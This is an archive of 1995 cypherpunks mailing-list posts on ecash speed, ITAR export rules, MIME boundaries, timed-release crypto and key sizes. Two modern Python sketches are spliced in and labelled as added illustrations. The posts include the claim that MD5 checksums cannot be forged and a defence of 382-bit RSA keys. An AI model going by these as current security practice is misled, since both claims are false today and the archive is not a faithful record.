From perry at piermont.com Thu Nov 9 06:56:30 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 22:56:30 +0800
Subject: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511091441.JAA15345@jekyll.piermont.com>

Hal writes:
> "Perry E. Metzger" writes:
>
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work. It would
> >> be good to find out if that is a serious problem.
>
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
>
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.

[Describes lots of steps...]

I'm really not that convinced that this is a problem in either direction.
With users everywhere on the net connected via multi-megabit per second links, high speed CPUs, etc, a few extra TCP connections and RSA operations really might not be noticed in a half dozen years.

> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.

Again, I'm not convinced either way. I believe we have to wait and see how fast things really are in practice.

Perry

From andreas at artcom.de Thu Nov 9 07:11:36 1995
From: andreas at artcom.de (Andreas Bogk)
Date: Thu, 9 Nov 1995 23:11:36 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Phil" == Phil Karn writes:

    Phil> as options. There's a 2048 bit optional modulus and may even
    Phil> be a 4096-bit option if I can find one in reasonable
    Phil> time. There was going to be a 512-bit optional modulus but

I'd like to see the 4096 bit modulus. Let me know if I can help you by donating computation power. We have a SGI Onyx with 4 processors and several smaller SGI computers.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMKIUdEyjTSyISdw9AQGEawP9FUG9X5t8n/w0BRcWVTPv6LeERgY78WHc
mBNG4ScvbRZK6o4ZoQuEr10v4eDqKQtHD3lkdV5HJO2+oBrNkLOLKyVR8sr0Yh+3
wKyOeF8BUKqwILteJGT8UQnznFnHha0m9HxlHOIUrx6SOGIMc6t6N4DFCRzOis0h
dc0pgYN2S/Y=
=QKwE
-----END PGP SIGNATURE-----

From rmartin at aw.sgi.com Thu Nov 9 07:15:04 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Thu, 9 Nov 1995 23:15:04 +0800
Subject: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <9511090956.ZM2558@glacius.alias.com>

On Nov 9, 7:52am, Rich Salz wrote:
> Subject: Re: Pegasus Mail
> I sure hope someone tells David Harris that his program is now export
> controlled. From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.

Hm. David Harris lives in New Zealand. This makes him a very good man to be writing mail software. Also makes Pegasus Mail our local software of choice. (We use it at school.) That it now has hooks for external encryption packages is very good news.

richard

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

From adam at lighthouse.homeport.org Thu Nov 9 07:29:02 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Thu, 9 Nov 1995 23:29:02 +0800
Subject: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091518.KAA08137@homeport.org>

I sure hope no one does. The ITARs seem to contain a 'scienter' requirement; that you must know (or have a reasonable idea) that you are breaking them for it to be criminal. If he thinks he's ok, he is until someone tells him otherwise.

I am not a lawyer. That is not legal advice. Go consult a good ITAR attorney if you want to try that at home. :)

Rich Salz wrote:
| I sure hope someone tells David Harris that his program is now export
| controlled. From my reading of his message, it seemed like he thinks he
| "beat the system" because he didn't include actual crypto code.

--
"It is seldom that liberty of any kind is lost all at once."
 -Hume

From hfinney at shell.portal.com Thu Nov 9 07:44:42 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 9 Nov 1995 23:44:42 +0800
Subject: Pegasus Mail
In-Reply-To: <9511091252.AA04699@sulphur.osf.org>
Message-ID: <199511091528.HAA05703@jobe.shell.portal.com>

Rich Salz writes:

>I sure hope someone tells David Harris that his program is now export
>controlled. From my reading of his message, it seemed like he thinks he
>"beat the system" because he didn't include actual crypto code.

Even if he were in the US, I would hope that no one told him that. One of the elements of the offense of violating the arms export control act is that the violation be willful. The exporter has to violate a known legal duty not to export the item. One of the reasons for this is simply that the ITAR list is long and technical and average individuals cannot be expected to know all its details.

This is mentioned in the Lizarraga case, at approximately 541 F2d 828:

"Two features of 22 USC 1934 strongly indicate that Congress used the term 'willful' to require a showing of specific intent. First, the statute prohibits exportation of items listed by administrative regulation, not by the statute itself. Second, upon referring to the pertinent regulation, 22 CFR part 121, we find that the regulation contains an exhaustive list of items including amphibious vehicles, pressure-breathing suits, aerial cameras, 'privacy devices,' and concealment equipment (including paints). Unlike those substances which are known generally to be controlled by government regulation, such as heroin or like drugs, these items might be exported or imported innocently. Under such circumstances, it appears likely that Congress would have wanted to require a voluntary, intentional violation of a known legal duty not to export such items before predicating criminal liability."

So in this case I think widespread publicity about the ITARs can be considered harmful. All those helpful people going around warning others that they are exporting software are actually removing a defense against charges of export.

Hal

From beavis at bioanalytical.com Thu Nov 9 08:23:00 1995
From: beavis at bioanalytical.com (Beavis B. Thoopit)
Date: Fri, 10 Nov 1995 00:23:00 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <47m82v$4p4@yage.tembel.org>
Message-ID: <199511091558.KAA00768@bioanalytical.com>

I have not yet convinced myself that a time-release information device is impossible....

Does there exist a storage device that, due to _dynamics_ (or other factor), prevents the total contents being read in one instance?

Bubble memory device? Torsion wire memory device?

Back at IBM, an old school customer engineer friend of mine used to bring in relics of IBM's illustrious past. One curious device was a memory device for an old terminal. This device consisted of about 10 feet of piano wire coiled into a spiral of about 6 inches diameter. An actuator would "twist" torsion waves onto the end of the wire. These waves would propagate down the wire and would be sensed falling off the opposite end. About 400+ bits could be stored on the wire by twisting (cwise/0 or ccwise/1) them onto one end, sensing them as they came off, and re-twisting them back on. The bits chased each other around this loop.

Assume that I can only read the bits as they fall off the end (one bit at a time).
Assume a transformation function (with state) in the middle of the "wire" which cryptographically transforms the bits.
Assume a device that holds 2^somewhatbig bits.
Assume a traversal delay around the device of 1 unit.
Assume disturbing the device ("grabbing the wire") destroys the information.
Assume the message sender loads the wire with an "encrypted" message.

Can I precompute a message that after N iterations around the "wire" (and through the transform) will spill out plaintext (N time units into the future)? Does such a transformation exist? (rings of the technology in S/key...)
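
Added illustration, not part of the original post: one transformation with the property asked about above is an iterated trapdoor permutation, where each lap applies x -> x^5 mod n and only the sender, who knows the factors of n, can undo N laps in one step. The exponent 5, the toy modulus built from two Mersenne primes and all function names are assumptions made for this sketch, the modulus is trivially factorable, and it is a conjecture, not a proven fact, that the laps cannot be short-cut without the factors.

```python
"""Iterated trapdoor permutation as the "transform in the wire" (added sketch)."""
from math import gcd

# Constructed toy parameters: both factors are well-known Mersenne primes,
# so anyone can factor n. They only make the arithmetic easy to follow.
P = 2**127 - 1
Q = 2**107 - 1
N_MOD = P * Q
PHI = (P - 1) * (Q - 1)      # the sender's trapdoor
E = 5                        # per-lap exponent; must be coprime to PHI
assert gcd(E, PHI) == 1


def lap(x: int) -> int:
    """One trip around the loop: the public transform T(x) = x^E mod n."""
    return pow(x, E, N_MOD)


def run_device(x: int, laps: int) -> int:
    """The device knows only n and E, so it applies T lap after lap."""
    for _ in range(laps):
        x = lap(x)
    return x


def sender_preload(message: int, laps: int) -> int:
    """Compute the value to load so that `laps` laps later the message appears.

    E^-1 mod PHI undoes one lap. Raising that inverse to the power `laps`
    (still mod PHI) undoes all laps at once, so the sender pays roughly
    log(laps) modular multiplications instead of `laps` sequential ones.
    """
    if not 0 < message < N_MOD:
        raise ValueError("message must be in 1..n-1")
    d_one = pow(E, -1, PHI)          # inverse exponent for a single lap
    d_all = pow(d_one, laps, PHI)    # inverse exponent for every lap together
    return pow(message, d_all, N_MOD)


def encode(text: str) -> int:
    return int.from_bytes(text.encode("ascii"), "big")


def decode(value: int) -> str:
    return value.to_bytes((value.bit_length() + 7) // 8, "big").decode("ascii")


def demo(laps: int = 2000) -> dict:
    secret = "open at lap 2000"               # constructed sample message
    loaded = sender_preload(encode(secret), laps)
    early = run_device(loaded, laps - 1)      # read one lap too soon
    on_time = lap(early)                      # the final lap
    return {
        "loaded_is_plaintext": loaded == encode(secret),
        "early_is_plaintext": early == encode(secret),
        "released": decode(on_time),
    }


if __name__ == "__main__":
    print(demo())
```

The sketch covers only the arithmetic; the assumption in the post that grabbing the wire destroys the contents is a hardware property and is not modelled here.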

From dcrocker at brandenburg.com Thu Nov 9 08:43:57 1995
From: dcrocker at brandenburg.com (Dave Crocker)
Date: Fri, 10 Nov 1995 00:43:57 +0800
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
Message-ID:

At 5:56 AM 11/9/95, Laurent Demailly wrote:
>I've waited a bit, but as nobody seems to have pointed out, you can
>definitely find a unique stream in a *single* pass (but maybe what you
>really want is no pass at all ?)

engineering versus math.

you can do it in zero passes, sort of.

Generate a hefty pseudorandom number and convert it to a hefty ascii string. What are the odds that that string will appear in ANY kind of data you are generating? Low. Measured in years and probably decades.

As you do the mime encapsulation, also scan for a collision. When you get it (once every 20 years or so), abort the processing and start over.

d/

--------------------
Dave Crocker +1 408 246 8253
Brandenburg Consulting fax: +1 408 249 6205
675 Spruce Dr. dcrocker at brandenburg.com
Sunnyvale, CA 94086 USA http://www.brandenburg.com

From hallam at w3.org Thu Nov 9 09:10:17 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 10 Nov 1995 01:10:17 +0800
Subject: Worth of Crypto Consulting
In-Reply-To: <199511090735.BAA01846@monad.armadillo.com>
Message-ID: <9511091650.AA22280@zorch.w3.org>

>I was wondering what "real" crypto consultants are getting these days.

I know some people who charge $500 a day and others who charge $5000

It basically depends on reputation and knowledge.

Phill

From raph at CS.Berkeley.EDU Thu Nov 9 10:10:07 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Fri, 10 Nov 1995 02:10:07 +0800
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <9511091356.AA09725@hplyot.obspm.fr>
Message-ID: <199511091715.JAA12871@kiwi.cs.berkeley.edu>

> Raph Levien writes:
> > On an unrelated topic... cypherpunks like to count bits, right?
> > What is the correct number of pseudorandom bits to use in a MIME
> > multipart separator? If the data has a line which matches the
> > separator, the message is corrupted. Of course, if you can take
> > multiple passes through the data, you can simply verify that it does
> ***************
> No need !
> > not contain a line which matches the separator. But if you're
> > restricted to a single pass, then the only way to do it is to use a
> > randomly generated separator.
> I've waited a bit, but as nobody seems to have pointed out, you can
> definitely find a unique stream in a *single* pass (but maybe what you
> really want is no pass at all ?)
> {you add a new random byte each time you find your sequence in the
> stream, and go forward (as the previous separator was not in the
> "past" of the stream, you don't need to go back)}

Yes, that's a good strategy _if_ you're able to take multiple passes. However, the separator must (of course) appear at the top of the multipart message being assembled. Perhaps we don't agree on what "single pass" means; I meant you could do the processing in a Unix pipe without requiring storage proportional to the size of the data.

> What am I missing ? (anyway, see below)
> (I hope my answer is not as clueless as the "A-dice anonymous" one)

Not quite. As they say, "A-dice" is not merely clueless, but actually clue-resistant.

> > I figure that 128 bits should _definitely_ be enough (that's what
> > is in the new premail code now). Even 64 bits should ensure that it is
> > unlikely that anyone will ever experience message corruption over the
> > expected lifetime of premail. However, it makes me nervous. What do
> > people think?
>
> Isn't PGP encoded stream containing only base64 chars ? Why not use
> "====PGP part #====" (as you can't have more than 2 = in a base 64,
> and only at the end anyway)
> or "@PGP part #" or whatever starting with a non base64 char ?

For PGP encrypted messages, I just use "+" as the boundary, as it is guaranteed that a valid PGP/MIME multipart/encrypted message body will never include the line "--+" or "--+--". For the longer separators, my concern is multipart/signed messages.

> so "@" = 8 bits is my answer, do I win ;-) ?

I chose "+" instead of, say, "@" because it will survive EBCDIC gateways. You might argue that this is worrying too much, but doing the right thing here costs nothing, and may actually save somebody some trouble.

Raph

From scottst at ionet.net Thu Nov 9 10:17:29 1995
From: scottst at ionet.net (Scott Staedeli)
Date: Fri, 10 Nov 1995 02:17:29 +0800
Subject: Pegasus Mail 2.20
Message-ID: <199511091727.LAA14980@ion1.ionet.net>

> From: Rich Salz
> Date: Thu, 9 Nov 1995 07:50:44 -0500
> To: scottst at ionet.net
> Subject: Re: Pegasus Mail 2.20
> Cc: cyperphunks at osf.org

> I sure hope someone tells David Harris that his program is now export
> controlled. From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
>
> Software that says "plug your own crypto here" is considered an ancillary
> device according to the ITAR. Or, as I heard some NSA people call it,
> "the classic 'crypto with a hole'." Seems kinda silly that the hole is
> the crypto, but hey that ancillary device clause, you just gotta love
> it.
>
> If Pegasus mail were written to support generic user-loadable content
> transforms, that would be different. But even then, you have to be careful
> how that's done. If you just did some global search-and-replace and came up
> with "keyed compression" you wouldn't get past anyone. But if you had an
> opaque state block that the user modules could set/use/clear, and you
> passed that along with your in/out buffers, then you'd be safe. Of course,
> they'd know what is really going on, but are powerless to prevent it.
> /r$
>

Actually, David Harris is a citizen of New Zealand.
If the US government tries anything, at least we'll know if ITAR applies to foreign written freeware.

--scottst at ionet.net------http://www.ionet.net/~scottst--
>~<^xXx | "The Internet is simply a means of
xX # | communication. Efforts to stop infor-
(XXX) # | mation by enjoining it are doomed to
(XXXXXXX) | failure in a free society."
DON'T TREAD ON ME| -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========

From raph at CS.Berkeley.EDU Thu Nov 9 10:20:49 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Fri, 10 Nov 1995 02:20:49 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <199511091725.JAA17620@kiwi.cs.berkeley.edu>

> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
>
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Perhaps it costs you "nothing," Perry, but not all of us have the massively parallel 64-way interleaved banked memory nanosecond-latency box you have on your desk. Since RSA decryption is cubic in key size, it takes about twenty times as long to sign or decrypt a message. Since latency-hiding (for example, caching the decrypted session keys) is not widely implemented, the user actually sees the difference. For applications such as remailers, a 20-fold factor can make the difference between smooth operation and totally hosing the machine.

Another reason to use small keys is to communicate the relative insecurity of the machine to senders.
A 382-bit key says, loud and clear, "don't send sensitive or incriminating information using this key."

Raph

From tcmay at got.net Thu Nov 9 10:24:19 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:24:19 +0800
Subject: Timed-release crypto and information economics
Message-ID:

At 3:58 PM 11/9/95, Beavis B. Thoopit wrote:

>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device? Torsion wire memory device?

"All crypto is economics."

There's a literature of sorts on "tamper-resistant modules," or "tamper-responding modules." Chips or packages that either resist tampering (= reading, opening, etc.) or that give indication they have been read, opened, or otherwise accessed.

"Quantum cryptography" aims at providing a "read only once" system. Consult the vast number of articles and comments available.

Basically, any secret stored in (traditional) hardware can be gotten with enough money. The issue is the amount of money it takes, and how many tries, to open the hardware. (And it may take a lot. Or destroy a lot of chips in the process. The similarities to bomb disposal are obvious: it may be _possible_ to disarm a bomb, but a lot of "learning" is likely to take place first.)

Search the archives if you wish for previous articles I and others have written on reverse-engineering chips with electron beam probes, for example.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
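
Added example for the MIME multipart separator exchange between Raph Levien, Laurent Demailly and Dave Crocker in the messages above; it is not code from premail or from any poster. It streams the parts in one pass with the boundary written first, scans each body line for a collision and restarts with a fresh boundary when one is found, and also checks the fixed "+" boundary against a constructed PGP-armored body; all function names and sample data are assumptions.

```python
"""Single-pass multipart writer with collision scan and restart (added sketch)."""
import io
import secrets


class BoundaryCollision(Exception):
    """A body line would be read as a delimiter; restart with a new boundary."""


def new_boundary(bits=128):
    """Random boundary carrying `bits` bits of entropy, hex encoded."""
    return secrets.token_hex((bits + 7) // 8)


def write_multipart(parts, out, boundary):
    """Stream `parts` (each an iterable of text lines) to `out` in one pass.

    The delimiter is written before any body line has been seen, which is the
    pipe constraint described in the thread. Each body line is compared with
    the delimiter as it goes by; a line that merely starts with the delimiter
    is rejected too, so a lenient parser cannot be confused either.
    """
    delim = "--" + boundary
    for lines in parts:
        out.write(delim + "\r\n\r\n")       # delimiter, then empty part headers
        for line in lines:
            line = line.rstrip("\r\n")
            if line.startswith(delim):
                raise BoundaryCollision(line)
            out.write(line + "\r\n")
    out.write(delim + "--\r\n")             # closing delimiter


def assemble(parts, pick=new_boundary, max_tries=5):
    """Abort and start over on a collision. Returns (boundary, text, attempts)."""
    for attempt in range(1, max_tries + 1):
        boundary = pick()
        out = io.StringIO()
        try:
            write_multipart(parts, out, boundary)
        except BoundaryCollision:
            continue                        # discard the output, try a new boundary
        return boundary, out.getvalue(), attempt
    raise RuntimeError("no collision-free boundary found")


def collision_bound(body_lines, bits):
    """Union bound on P(any body line hits a fresh random boundary).

    Holds for data chosen independently of the boundary: each line matches
    with probability at most 2**-bits.
    """
    return min(1.0, body_lines / 2.0 ** bits)


def fixed_boundary_is_safe(lines, boundary="+"):
    """The fixed-boundary shortcut is valid only if no line starts with '--+'."""
    delim = "--" + boundary
    return not any(line.startswith(delim) for line in lines)


# Constructed sample: the shape of a PGP-armored body (not a real message).
ARMORED = [
    "-----BEGIN PGP MESSAGE-----",
    "Version: 2.6.2",
    "",
    "Y29uc3RydWN0ZWQgc2FtcGxlIGJvZHksIG5vdCBhIHJlYWwgbWVzc2FnZQ==",
    "=AbCd",
    "-----END PGP MESSAGE-----",
]

if __name__ == "__main__":
    b, text, tries = assemble([ARMORED, ["plain text part"]])
    print(b, tries, len(text))
    print("64-bit boundary, 1e9 lines:", collision_bound(10**9, 64))
    print("'+' safe for armored body:", fixed_boundary_is_safe(ARMORED))
```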

From tcmay at got.net Thu Nov 9 10:27:13 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:27:13 +0800
Subject: Caching Cash (ecash speed)
Message-ID:

At 9:14 AM 11/9/95, Bill Stewart wrote:

>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_
>cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend. An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.
>
>If that's not anonymous enough for you (because your IP address could be
>traced when you buy the tokens, and coordinated with them later),
>use a packet laundry, or connect from your dialup access provider,
>which will tell the newspaper you're port43.server29.netcom.com or
>something equally uninformative; or dial in from the public library or cafe.

Tokens, coupons, gift certificates, etc., are all good examples of _caching_. As, looked at in a certain way, ordinary folding or jangling cash is an example of caching. (Yes, quibblers, it is true that we view folding money as "real money," but really it's a series of claims against some store of value, formerly gold and silver, and now...?)

Instead of constant interactions with a bank, we place money in "cash memory" (I mean, "cache memory").

The concerns Hal raises about ecash speed are important. CPU speeds are not the problem, network speeds are---many home and small business users have very fast CPUs, able to function as Web servers all by themselves, but have relatively slow network connections.

So, various schemes for reducing the network bottlenecks will be likely. Tokens are a good example.
And as Bill notes, token laundries can make them _effectively_ untraceable, good enough for many of the low-value transactions for which they are intended.

(As usual, more security means more computation, more delay, all other things being equal. "TANSTAAFL"--There Ain't No Such Thing As A Free Lunch.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hfinney at shell.portal.com Thu Nov 9 10:34:18 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 10 Nov 1995 02:34:18 +0800
Subject: New patent rules
Message-ID: <199511091751.JAA15752@jobe.shell.portal.com>

Reading the latest Foresight Update articles in the sci.nanotech newsgroup, I came upon an analysis of upcoming changes to the patent laws. With the signing of the GATT treaty the laws will change next year. Here is one of the changes, quoting from the article:

    Infringement. Present U.S. patent law grants to a patent holder the right to exclude others from making, using, or selling the patented invention in the United States. After about January 1, 1996, a patent holder has the right to exclude others also from offering for sale patented products or products made using a patented process. Thus, under the law as amended, the mere offer for sale of a patented product may be treated as an infringing act. In addition, it will be illegal to import a product covered by a U.S. patent.

At first I thought this would not have much impact on crypto software, which is of course heavily patented.
The current laws already prevent people from making, using, or selling software which uses patented algorithms. The new restrictions on products made using a patented process would not seem to be relevant.

But there is a possible interpretation which would be very significant. What if data which has had cryptographic transformations applied were viewed as a product of a possibly patented process? An RSA-signed or -encrypted message might then be such a product. A blinded coin or other credential, a key signature or certificate, virtually all of the things we are interested in could be thought of in those terms.

We have occasionally discussed setting up offshore servers and such to perform patented cryptographic algorithms. But if the resulting data is itself illegal to import, that would make this strategy much more difficult. Would it become illegal to "import" messages from non-RSAREF versions of PGP, or to hand someone a Chaum-type cash token issued by an offshore bank in a jurisdiction where his patents don't apply?

I wonder if the lawyers on the list have any thoughts about whether such an interpretation of the GATT rules is likely to stand.

Hal

From rmartin at aw.sgi.com Thu Nov 9 11:04:09 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Fri, 10 Nov 1995 03:04:09 +0800
Subject: [Sci-Fi] Re: expiration dates on cryptography
In-Reply-To:
Message-ID: <9511081824.ZM25431@glacius.alias.com>

For methods of jiggering physical clocks, one might eventually reach the stage of attempting to have physically unjiggable clocks. [Well, theoretically unjiggable, just as our hideously huge composites are thought unfactorable by computability arguments.]

Example: I have a piece of information which I wish to remain secret until a well-defined date in the future. I encrypt it then lob a package containing the information into a well-defined and predictable trajectory which will cause it to intersect the earth's trajectory at that time [or shortly thereafter].
I would [guess, hope, no, I haven't sat here and calculated] that there should exist possible systems where beyond an initial period of about a week, there would be no earthly technology capable of catching up with the packet.

Alright, so it's hideously expensive. But you could put a lot of information into one packet. Apollo Assured Archiving could have fixed rates per megabyte, with regular [monthly?] launches into reliable orbits.

At which point the joy becomes making sure there aren't packet-catching bases on the far side of Mercury... [with the mind control lasers, of course]

frodo

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu
http://www.io.org/~samwise
Trinity College UofT
ChemPhysCompSci 9T7+PEY=9T8
Shad Valley Waterloo 1992

From jsw at netscape.com Thu Nov 9 11:04:46 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Fri, 10 Nov 1995 03:04:46 +0800
Subject: checksums for Netscape Navigator 2.0 Beta 2
Message-ID: <199511091816.KAA04865@ghoti.mcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

This file contains checksums for the Netscape Navigator 2.0 Beta 2 distribution files that are available on the Netscape ftp site under the directory ftp://ftp.netscape.com/2.0beta/.

This file has been digitally signed using PGP to assure its authenticity. The version of PGP which was used to create the digital signature on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

This file was signed using my personal PGP key. My PGP public key, which can be used to verify the signature on this file, can be obtained from my web page using this URL:

http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw at netscape.com' from the PGP key server at mit:

http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

There are three sets of checksums in this file. The first set of checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two forms of the unix 'sum' command. The 'sum' command creates a 16-bit checksum, which can be used to detect accidental corruption during download, but is too small to protect you from malicious tampering.

There are two versions of the checksums for the unix 'sum' command because unix vendors follow two different standards. I have labeled the checksums with the systems that they are good for. If you are performing the checksum operation on a unix system that is not listed, check both lists and make sure that one matches. Note that some Sun systems have both versions of the sum command, so the results you get will depend on your shell PATH variable.

--Jeff

========================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2 distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.

========================================================

These checksums were generated using the Unix 'sum' command.
These checksums are for the form of the sum command that is on Sun, SGI IRIX and HPUX systems.

========================================================

These checksums were generated using the Unix 'sum' command. These checksums are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and Linux systems.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

Jeff Weinstein - Electronic Munitions Specialist
Netscape
Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From beavis at bioanalytical.com Thu Nov 9 11:37:30 1995
From: beavis at bioanalytical.com (Beavis B. Thoopit)
Date: Fri, 10 Nov 1995 03:37:30 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <199511091852.NAA01172@bioanalytical.com>

> That's a pretty large number of assumptions:
>
>   tamper-proof delay line
>   => tamper-proof crypto box ("transformation function with state")
>   => tamper-proof delay line
>
> Why not just put a tamper-proof clock in the tamper-proof crypto box
> and not bother with the delay lines?

The tamper proof aspect is really secondary to the math question. The idea that if I set up a stream of bits through a transform, that the original state of the transform affects the final outcome after N iterations.

If the transform exists, it will ease/eliminate the reliance on the "economics" of cryptography to build a tamper-proof physical device.

Here is another implementation of the idea:

    initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
    do forever /* actually until the plaintext spews out */
        sleep 1 unit
        for each element in the buffer
            buffer[ element ] = magictransform( buffer[ element ] )

The initial buffer must be secret! Calculating the initial buffer in such a way that after N iterations the plaintext message appears is what must happen.

From frantz at netcom.com Thu Nov 9 11:38:57 1995
From: frantz at netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 03:38:57 +0800
Subject: Caching Cash (ecash speed)
Message-ID: <199511091850.KAA12286@netcom17.netcom.com>

At 10:41 11/9/95 -0800, Timothy C. May wrote:
>The concerns Hal raises about ecash speed are important. CPU speeds are not
>the problem, network speeds are---many home and small business users have
>very fast CPUs, able to function as Web servers all by themselves, but have
>relatively slow network connections.

Tim is of course right that network speeds are the problem. However, the network limit is the speed of light and not current network technology. If your bank is half-way around the world, the 1/7 second round trip will kill any chance you have of offering 1/10 second response time.

For some thinking on the subject of caching cash, see the "Digital Silk Road" paper accessible through the Agorics home page: http://www.webcom.com/~agorics/

BTW - I don't think we should be talking about a penny/page cost because it is way too high for the current market. For example, my copy of Applied Cryptography V2 cost about $.067/page AND came with the media to keep it "forever". My (used) copy of Snow Crash cost closer to a penny/page and also came with the media. I would think that somewhere between 1/100 to 1/10 of a penny/page is closer to the current market value of the page content.

Bill

-----------------------------------------------------------------
Bill Frantz         Periwinkle -- Computer Consulting
(408)356-8506       16345 Englewood Ave.
frantz at netcom.com   Los Gatos, CA 95032, USA

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Nov 9 11:43:29 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Fri, 10 Nov 1995 03:43:29 +0800
Subject: Pegasus Mail
In-Reply-To: <199511091528.HAA05703@jobe.shell.portal.com>
Message-ID:

Hal writes:

: One
: of the elements of the offense of violating the arms export control act
: is that the violation be willful. The exporter has to violate a known
: legal duty not to export the item. One of the reasons for this is simply
: that the ITAR list is long and technical and average individuals cannot be
: expected to know all its details. This is mentioned in the Lizarraga
: case, at approximately 541 F2d 828:

. . . .
: So in this case I think widespread publicity about the ITARs can be
: considered harmful. All those helpful people going around warning others
: that they are exporting software are actually removing a defense against
: charges of export.

This is a serious problem. On the other hand there are civil penalties for violating the ITAR that can be imposed without any showing of willfulness. So the non-willful exporter is still at risk, even if he does not know it. And if people are not informed in general, then the boys from the Office of Defense Trade Controls and NSA, can selectively inform only those whom they wish to harass, which is perhaps the nastiest aspect of the ITAR.

The only long term solution is to establish that the ITAR's provisions relating to cryptographic software are unconstitutional and void.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From dee at cybercash.com Thu Nov 9 11:47:44 1995
From: dee at cybercash.com (Donald E. Eastlake 3rd)
Date: Fri, 10 Nov 1995 03:47:44 +0800
Subject: (cpx) Re: ecash speed
In-Reply-To:
Message-ID:

There is certainly no need for an extra connection from the merchant back to the customer. See draft-eastlake-internet-payment-00.txt.

Donald (not on cypherpunks)

On Thu, 9 Nov 1995, Robert Hettinga wrote:

>
> --- begin forwarded text
>
> Date: Wed, 8 Nov 1995 21:08:51 -0800
> From: Hal
> To: cypherpunks at toad.com
> Subject: Re: ecash speed
> Sender: owner-cypherpunks at toad.com
> Precedence: bulk
>
> "Perry E. Metzger" writes:
>
> >Hal writes:
